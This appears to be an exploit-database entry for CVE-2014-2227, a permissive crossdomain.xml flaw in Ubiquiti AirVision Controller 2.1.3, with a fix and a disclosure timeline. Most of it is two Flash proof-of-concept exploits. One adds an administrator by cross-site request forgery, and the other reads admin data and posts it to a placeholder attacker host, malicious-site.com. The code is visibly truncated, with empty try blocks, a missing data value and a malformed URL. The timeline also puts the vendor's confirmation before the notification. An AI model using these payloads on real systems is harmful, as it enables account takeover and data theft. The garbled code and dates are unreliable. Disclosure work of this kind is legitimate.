Ubiquiti AirVision Controller 2.1.3 Weak Settings

EKU-ID: 4176 CVE: 2014-2227 OSVDB-ID:
Author: 佚名 Published: 2014-07-28 Verified: Verified



Ubiquiti Networks (http://www.ubnt.com/)

Affected Products/Versions:
AirVision Controller v2.1.3
Note: Previous versions may be affected

Title: Overly Permissive default crossdomain.xml file
CVE: CVE-2014-2227
CWE: http://cwe.mitre.org/data/definitions/264.html
Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2227.html
Researcher: Seth Art - @sethsec

POC #1: Using crossdomain.xml to execute CSRF and add an  administrator:

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;
 import flash.net.URLRequestHeader;

 public class XDomainXploit3 extends Sprite {
  public function XDomainXploit3() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "https//victim:7443/api/2.0/admin";
   var header:URLRequestHeader = new URLRequestHeader("Content-Type",
"text/plain; charset=UTF-8");
   var readRequest:URLRequest = new URLRequest(readFrom);
   readRequest.method = URLRequestMethod.POST
   readRequest.data =
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
   } catch (error:Error) {
    trace("Error loading URL: " + error);

  private function eventHandler(event:Event):void {
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://www.malicious-site.com/crossdomain/store.php"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
   } catch (error:Error) {
    trace("Error loading URL: " + error);

POC #2: Using crossdomain.xml to exfiltrate log data:

// Customized AirVision POC Author: Seth Art (sethsec at gmail.com)
// POC Template Author: Gursev Singh Kalra (gursev.kalra at foundstone.com)
// POC Template Author's github:
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;

 public class XDomainXploit extends Sprite {
  public function XDomainXploit() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "/victim:7443/api/2.0/admin";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try {
   } catch (error:Error) {
    trace("Error loading URL: " + error);

  private function eventHandler(event:Event):void {
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://www.malicious-site.com/admin"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try {
   } catch (error:Error) {
    trace("Error loading URL: " + error);

AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
The application name changed from AirVision to UniFi Video)

Disclosure Timeline:

2014-02-25: Notified Ubiquiti of crossdomain vulnerability in AirVision product
2014-02-19: Ubiquti confirms receipt of AirVision report and existence
of the vulnerability
2014-02-28: CVE-2014-2227 assigned
2014-03-12: Requested status update
2014-03-27: Requested status update
2014-04-07: Requested status update
2014-04-09: Ubiquiti provides timeline for solution
2014-04-18: UniFi Video 3.0.1 is released
2014-06-13: Set public disclosure date of 2014-07-24
2014-07-24: Public disclosure